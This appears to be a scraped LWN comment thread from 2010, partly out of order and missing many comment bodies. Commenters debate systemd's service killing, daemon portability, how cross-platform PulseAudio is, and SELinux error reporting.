I never claimed that nobody wanted multi-user support. I'd like it, especially the ability to have a guest account on my phone, capable of making calls but nothing else.
I just feel kind of frustrated when people announce that gosh, something is the most important feature ever, because they "know at least one user who wants and could understand it."
Posted Nov 20, 2010 19:04 UTC (Sat)
by ebiederm (subscriber, #35028)
[Link]
Posted Nov 20, 2010 14:21 UTC (Sat)
by loevborg (guest, #51779)
[Link] (14 responses)
Posted Nov 20, 2010 15:13 UTC (Sat)
by AlexHudson (guest, #41828)
[Link] (9 responses)
Posted Nov 20, 2010 21:45 UTC (Sat)
by HelloWorld (guest, #56129)
[Link] (7 responses)
Posted Nov 21, 2010 3:43 UTC (Sun)
by Tara_Li (guest, #26706)
[Link] (4 responses)
Posted Nov 21, 2010 12:48 UTC (Sun)
by MisterIO (guest, #36192)
[Link]
Posted Nov 21, 2010 18:08 UTC (Sun)
by nix (subscriber, #2304)
[Link] (1 responses)
Posted Nov 22, 2010 0:05 UTC (Mon)
by Tara_Li (guest, #26706)
[Link]
Posted Nov 24, 2010 23:40 UTC (Wed)
by AndreE (guest, #60148)
[Link]
Posted Nov 23, 2010 0:45 UTC (Tue)
by rsidd (subscriber, #2582)
[Link] (1 responses)
Posted Nov 23, 2010 9:40 UTC (Tue)
by mpr22 (subscriber, #60784)
[Link]
When the people who talk like that are talking to each other, it is correct usage. Language being the synchronically and diachronically variable thing that it is, correctness of usage is determined by context. (Also, to my mind "could of" is mostly only disagreeable because of how it's written - and it only achieves that because contemporary Modern English, thanks to the wonders of massive phonological shifts over the past several hundred years, routinely has severe disconnects between what sounds a word contains and what sounds it's spelled as if it contains.)
Posted Nov 21, 2010 8:54 UTC (Sun)
by epa (subscriber, #39769)
[Link]
Posted Nov 21, 2010 6:32 UTC (Sun)
by mfedyk (guest, #55303)
[Link] (1 responses)
--kill-user
Posted Nov 22, 2010 15:24 UTC (Mon)
by nye (subscriber, #51576)
[Link]
Strongly seconded. Even just changing it to '--kill-what' would be an improvement.
Posted Nov 22, 2010 13:48 UTC (Mon)
by mpr22 (subscriber, #60784)
[Link] (1 responses)
Command line parameters are not that kind of formal context. They are formal in the mathematical sense, but someone issuing peremptory commands to a subordinate (and you can be sure I consider my computer to be subordinate to me) is (a) not likely to care about honouring the who/whom nitpick (b) rather likely to be irritated if the subordinate gives them backchat over the matter.
Posted Dec 7, 2010 14:51 UTC (Tue)
by robbe (guest, #16131)
[Link]
Yessss, I'd like that. Kinda like the parser berating you in some Steve Meretzky text adventures.
I suggest making it depend on an environment variable, akin to $POSIXLY_CORRECT.
Posted Nov 20, 2010 16:06 UTC (Sat)
by charlieb (guest, #23340)
[Link] (7 responses)
Really? Didn't DJB's daemontools solve that problem in the 90s?
http://cr.yp.to/daemontools.html
Posted Nov 20, 2010 22:46 UTC (Sat)
by ejr (subscriber, #51652)
[Link] (1 responses)
Posted Nov 22, 2010 23:53 UTC (Mon)
by marcH (subscriber, #57642)
[Link]
> Just how we work.
not?
Posted Nov 21, 2010 1:23 UTC (Sun)
by jwb (guest, #15467)
[Link] (4 responses)
Posted Nov 21, 2010 3:42 UTC (Sun)
by wahern (subscriber, #37304)
[Link]
Posted Nov 21, 2010 15:45 UTC (Sun)
by charlieb (guest, #23340)
[Link] (2 responses)
I don't know where *you* got that idea. I was referring to killing services (by reliable delivery of signals to them). A properly written service will kill its own children.
> It is completely up to the author of the service script to handle
The service program, whether it be script or otherwise. But that is often distinct from a service 'run' script, which will usually exec the service itself. The run script will very seldom be responsible for killing children - it will have long ago already terminated, via exec.
See also:
Posted Nov 22, 2010 16:23 UTC (Mon)
by martinfick (subscriber, #4455)
[Link]
Did you miss the point about why you may want to kill a service in the first place? Hint: because it may no longer be behaving.
Posted Nov 22, 2010 18:22 UTC (Mon)
by vonbrand (subscriber, #4458)
[Link]
I'd much prefer "properly written services" not bothering at all with anything except offering said service. Just check out how you can write a fully functional network service in less than half a dozen lines of shell (!) if you use {,x}inetd...
Posted Nov 20, 2010 17:30 UTC (Sat)
by mheily (subscriber, #27123)
[Link] (21 responses)
However, since System V-style init scripts are the biggest competitor to systemd, they aren't mentioned at all. This is standard advertising technique, just as you wouldn't expect an ad for Coke to say "it tastes as good as Pepsi, but is not as sweet".
Lennart Poettering does bring up a good point about badly behaved daemons that don't kill their child processes properly when you send the parent a SIGTERM signal. The correct solution to this problem is to fix the daemon so that it installs a signal handler to kill and reap any child processes upon receipt of a SIGTERM signal. Having systemd automatically send a SIGTERM to each child process is not going to magically make the child process terminate cleanly.
Posted Nov 20, 2010 17:40 UTC (Sat)
by pbonzini (subscriber, #60935)
[Link] (19 responses)
Posted Nov 20, 2010 18:31 UTC (Sat)
by wahern (subscriber, #37304)
[Link] (18 responses)
All of this systemd nonsense... unless and until systemd becomes available on *BSD (including OS X), why would I care? As a developer it provides nothing of value to me; I can accomplish all of these things using portable interfaces, and while there is code redundancy it's nominal. As a user, on Linux `service foo stop' should work no matter whether systemd is running. Being able to force-kill a process group (or cgroup in systemd's case, I suppose) is just QoI.
Posted Nov 20, 2010 22:04 UTC (Sat)
by slashdot (guest, #22014)
[Link]
Another fatal problem with pid files is race conditions: by the time you kill(pid), pid may have been reassigned.
What is not really clear to me is whether systemd is the right place to do this, or whether "spawn_process_in_new_named_cgroup" and "kill_cgroup" tools would be better.
Also, putting a lot of functionality in PID 1 seems silly, since the kernel will panic if it crashes: some kind of very minimal PID 1 that just spawns the real init, forwards signals to it, and restarts it seems much better. This is probably easy to add to systemd, though.
Posted Nov 21, 2010 4:04 UTC (Sun)
by foom (subscriber, #14868)
[Link] (16 responses)
Posted Nov 21, 2010 5:47 UTC (Sun)
by wahern (subscriber, #37304)
[Link] (15 responses)
Now, I always write my daemons so that by default they run in the foreground and log to stderr. But I also build in the ability to background, manage the PID, redirect logging, interpose a watchdog to restart failed processes, check a deadman switch from an interval timer to catch runaway processes, etc. You have to do all of these things to portably support those capabilities; and it's not that much work believe it or not. And that code is very reusable, for me at least. (There are libraries to do some of this but it's one of those things that is too tied up in coding style and process design to easily farm out.)
Posted Nov 21, 2010 8:07 UTC (Sun)
by tzafrir (subscriber, #11501)
[Link] (14 responses)
Posted Nov 21, 2010 19:46 UTC (Sun)
by wahern (subscriber, #37304)
[Link] (13 responses)
Posted Nov 22, 2010 2:38 UTC (Mon)
by foom (subscriber, #14868)
[Link] (12 responses)
And in the meantime (or on other platforms) you can use daemontools to do the backgrounding and such.
Posted Nov 22, 2010 3:24 UTC (Mon)
by wahern (subscriber, #37304)
[Link] (11 responses)
Great. So when I have three terminal windows open and am testing in OpenBSD, OS X, and Linux, I'll just make sure to maintain 3 different configurations for each particular tree I have checked out--which could be several per box--and invoke the relevant launchd, systemd, or daemontools command instead of relying on a consistent set of switches provided by the only application I care about at the moment.
Here are the usage switches of one of my daemons. I always provide the process management switches -d, -w, -p, -e, -u and -r in all of my daemons.
To reiterate, the problem isn't that any of these frameworks aren't comprehensive feature wise, it's that none are standard and all assume that you're running something in production. You think PostgreSQL is going to rip out their process daemonizing and process management code just because systemd is uber-cool? You think Apache HTTPd will drop its `apachectl' because launchd is available on most of the developers' laptops?
It's of course good Unix design to allow a user or administrator to use any tool they prefer to manage these things. It's another thing entirely to say that those tools displace the necessity of a daemon managing these things itself. It's not enough to allow someone to use any other tool; a decent application should also work with no other tool at all.
This is why systemd is exciting for administrators but developers will hardly take notice. Those applications which depend on something like systemd will always be suspect to me. It means that the developer focused insufficiently on portability, and the odds of an application being robust and secure without being constantly and rigorously used and tested on a variety of platforms are very slight compared to those which are.
Posted Nov 22, 2010 8:15 UTC (Mon)
by nix (subscriber, #2304)
[Link] (10 responses)
Personally I will always look on this attitude with a mixture of suspicion and incomprehension: suspicion that someone came too recently from Windows, and incomprehension that anyone would want to restrict the environments in which they run so much, for the sake of saving not very many headaches in porting. I mean, I can (barely) understand it for deep magic like systemd, but emphasising the nonportability of PulseAudio remains incomprehensible to me. A better way of making sure that apps won't hurry to support your framework (it's not general, it's just another one-platform fire in the night) I cannot imagine.
Posted Nov 22, 2010 8:49 UTC (Mon)
by Cyberax (✭ supporter ✭, #52523)
[Link] (9 responses)
The problem is, nobody cares enough to actually use it.
Posted Nov 22, 2010 15:23 UTC (Mon)
by nye (subscriber, #51576)
[Link] (5 responses)
As Linus is fond of saying, 'code talks, bullshit walks'.
Posted Nov 22, 2010 15:37 UTC (Mon)
by Cyberax (✭ supporter ✭, #52523)
[Link] (4 responses)
"PulseAudio is designed for Linux systems. It has also been ported to and tested on Solaris, FreeBSD, NetBSD, MacOS X, Windows 2000 and Windows XP."
And in fact, it really works on Windows.
Posted Nov 22, 2010 16:29 UTC (Mon)
by nye (subscriber, #51576)
[Link] (3 responses)
I believe you are a liar, sir.
Posted Nov 22, 2010 16:32 UTC (Mon)
by Cyberax (✭ supporter ✭, #52523)
[Link] (2 responses)
Why do you think that Lennart is lying about the cross-platform design of PA?
Posted Nov 23, 2010 13:12 UTC (Tue)
by nye (subscriber, #51576)
[Link] (1 responses)
Because I use Windows as my primary desktop platform, and hence have actually tried it.
It's been years since anyone's even managed to get it to *build*, let alone work. There is one build from 2007 which can't be reproduced and is said to work after a fashion on some systems, though I've not managed to coax it into operation.
Googling for information on using PA on OS X yields some hits from last year of people pleased that they got it to compile, but not to actually work. Perhaps Google's missing some better, more recent news, but it's not looking good.
The claim on the website that PA is cross-platform is shameful.
Posted Nov 23, 2010 13:57 UTC (Tue)
by nye (subscriber, #51576)
[Link]
Posted Nov 22, 2010 18:33 UTC (Mon)
by wahern (subscriber, #37304)
[Link] (2 responses)
A piece of software will only ever get thoroughly tested on another platform if it works out-of-the box on that platform and works well. This is why when designing portable applications you have to live with certain least common denominators and spend so much time on reinventing the wheel. If it's not easy and convenient to run and use then it's not going to be well tested, period, and it's not honest to say that the environment is truly supported. It's a pragmatic consideration, but a real and substantial one nonetheless.
Dependencies always create barriers, and a meta-dependency like systemd that requires external configuration is a significant barrier, relatively speaking. It's like micro-payments. Maybe a penny is worth paying to read an article, but the marginal cost compared to zero is infinite. Furthermore, the absolute cost is mostly composed of transaction costs, not the monetary cost per se.
Posted Nov 22, 2010 22:53 UTC (Mon)
by Cyberax (✭ supporter ✭, #52523)
[Link] (1 responses)
There's nothing to gain from running PulseAudio, so there's little interest in doing it even though it's nicely portable. So this example of PulseAudio as a non-portable library is quite poor.
Posted Nov 23, 2010 0:52 UTC (Tue)
by wahern (subscriber, #37304)
[Link]
Posted Nov 21, 2010 8:57 UTC (Sun)
by epa (subscriber, #39769)
[Link]
[2] http://selinuxproject.org/page/SVirt
'non-member temp_shared_file read alert: do you want to make /tmp/* 0777 to fix? click yes and enter root password to fix'.
In this case, no, SELinux offers absolutely no way for users to define their own policy.
What happened to the principle of least privilege?
I believe that is what the phrase "mandatory access control" means. The administrators set the policy and the users have no choice but to follow it.
Right, but who says the administrator has to be the root account? If the web server runs as user apache, surely the administrator should need access only to that account - not life and death authority over everything on the machine, including all other accounts.
In this case, no, SELinux offers absolutely no way for users to define their own policy. The policy is a complex data structure loaded into the kernel. Not something you want users to be able to muck with.
That's... not a very good argument. You could describe the filesystem in the same way, and say that of course the system administrator is the only person who should be able to create new files, though users can fill them up. (This is just what a lot of 1950s-era operating systems did.)
The New Thing
Now we have to wait for a generation of "Well the POSIX permissions check out, so it's clearly broken, let's just switch off SELinux" to collect their pensions and be replaced by people who know to look in the logs, know how to interpret what the logs mean, etc.
No, having to look in the logs is completely insane. For a start don't you have to be root to do that?
if (!fwrite(fl, ...)) // An error happens
{
    int err = errno;
    fclose(fl); // Whoops, we've just lost the exception info.
    return err;
}
I also agree that error strings suck. However, error integers suck even more.
You want information in program-readable format first (although perhaps augmented with some standard library code that can give a standard human-readable rendering in the user's locale), so that the program can stand to act on the information without having to parse a string.
The trouble with making a program-readable format is that you have to enumerate all possible failure modes in advance. Suppose you defined such an interface before SELinux was introduced. Now what happens when a program built against the original interface runs on a system with SELinux turned on? It could only get some catch-all 'operation failed' which is no better than the EPERM we have at the moment. At some point you have to allow for free-form error strings as a kind of escape valve to report all sorts of problems that weren't thought of when the interface was designed.
That's the point of exceptions - you DON'T need to enumerate everything in advance.
But if an application has no idea what an SELinuxPermissionException is (except that it is some type of PermissionException) then these type names are themselves no better than magic strings. You could print to the user 'caught SELinuxPermissionException' but how is that better than 'SELinux error: read access to file /foo/bar denied by policy PolicyXXX set in file /etc/selinux/whatever'?
struct error_report
{
    uint32_t flags;  /* Bitmap of common error situations */
    uint32_t format; /* Tag: format of 'details' below */
    /* ... put some more common fields here ... */
    union
    {
        char unused[PAGE_SIZE - N]; /* Set 'N' so overall struct is page sized */
        struct error_report_format_0 format0;
        struct error_report_format_1 format1;
        /* ... add more as needed ... */
    } details;
};

struct error_report_format_0
{
    char message[PAGE_SIZE - N];
};
> not overwhelm the novice with too much feedback :) SELinux's answer to
> everything is EPERM! This can be infuriating when everything seems OK to a
> POSIX-educated but SELinux-ignorant user who looks at rwxr-xr-x and sees
> no problem. Disabling SELinux is the solution to a huge range of problems
> and for that reason most administrators simply disable it as policy.
Limiting files to those chosen by the FileChooser
> user apps. There are new problems that are going to hit us real soon that
> even the android model will not address. The new internet devices will
> need a way for the GUIs and apps to be multi user safe
> without you being able to lookup my passwords or read my email. GUI's are
> going to need to be able to function in mixed kiosk/user modes. In other
> words, users are not going to want to have to login to a device like a
> tablet every time they pick it up. For a phone, that is OK, but not for a
> tablet.
> What's wrong with Android's security model? It sounds like exactly what you want. Each application is sandboxed with only the capabilities that the user allowed it to have when it was installed.
--kill-pid
--kill-service
$ tool --who user732
tool: assuming '--whom', as user732 is the object, not the subject of
this action.
Rewriting history
> even being able to properly kill services. systemd for the first
> time enables you to do this properly.
Solution in search of a problem
I'm not sure if systemd and cgroups fix this, but hopefully they do.
Usage: xera -u:Ur:Rb:BdDwWp:Pl:t:e:zZvVh [start|stop|restart]
-u, --user=USER[.GROUP] run as specific user (e.g. '_xera')
-r, --root=PATH chroot path (e.g. '/var/xera')
-b, --base=PATH base path (e.g. '/srv')
-d, --daemon run as daemon (i.e. fork into background)
-w, --watchdog use watchdog to restart daemon
-p, --pidfile=PATH path to pid file (e.g. '/var/run/xera.pid')
-l, --listen=HOST:PORT RTSP/HTTP ports (e.g. '[::1]:8000:http')
-t, --threads=N:M number of frontend and backend threads
-e, --stderr=PATH|PIPE file or command to send stderr (e.g. '|rotatelog')
-z, --timestamp timestamp log messages; default if daemon
-v, --verbose=LEVEL fatal, critical, error, warn, notice, info, debug
-V, --version print program information
-h, --help print this usage information
> It means that the developer focused insufficiently on portability
Indeed, in Lennart's case he was explicit that he didn't care about it at all.
On a modern Unix-like system, nobody should be using pkill(1) or kill(1) to terminate daemons. That's what the init script is for; you should run '/etc/init.d/apache stop' to stop Apache, instead of manually sending signals to various processes.
He addresses this question in the comments: sometimes you do need to aggressively kill a misbehaving daemon, rather than politely asking it to stop.
> Lennart Poettering does bring up a good point about badly behaved daemons that don't kill their child processes properly when you send the parent a SIGTERM signal. The correct solution to this problem is to fix the daemon so that it installs a signal handler to kill and reap any child processes upon receipt of a SIGTERM signal. Having systemd automatically send a SIGTERM to each child process is not going to magically make the child process terminate cleanly.
Since even after 30 years such daemons still exist, wouldn't it be better to handle this in a single place where it can more easily be made to work? (At least as a default setting.)